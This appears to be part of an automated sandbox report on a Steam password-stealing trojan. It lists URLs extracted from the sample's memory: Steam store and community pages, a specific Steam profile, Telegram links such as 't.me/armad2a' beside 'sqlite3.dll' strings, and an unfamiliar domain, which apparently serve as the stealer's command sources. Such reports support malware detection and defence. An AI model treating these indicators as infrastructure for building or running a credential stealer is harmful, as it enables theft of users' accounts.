          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=09hfUHwxDUY7&l=e
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
          Source: 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&l=en
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://help.steampowered.com/en/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
          Source: 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
          Source: 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F76000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259$
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259ex
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259r
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://store.steampowered.c
          Source: 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
          Source: 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.dr | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/armad2a
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/armad2a4
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://telegram.org/img/t_logo_2x.png
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.telegram.org
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
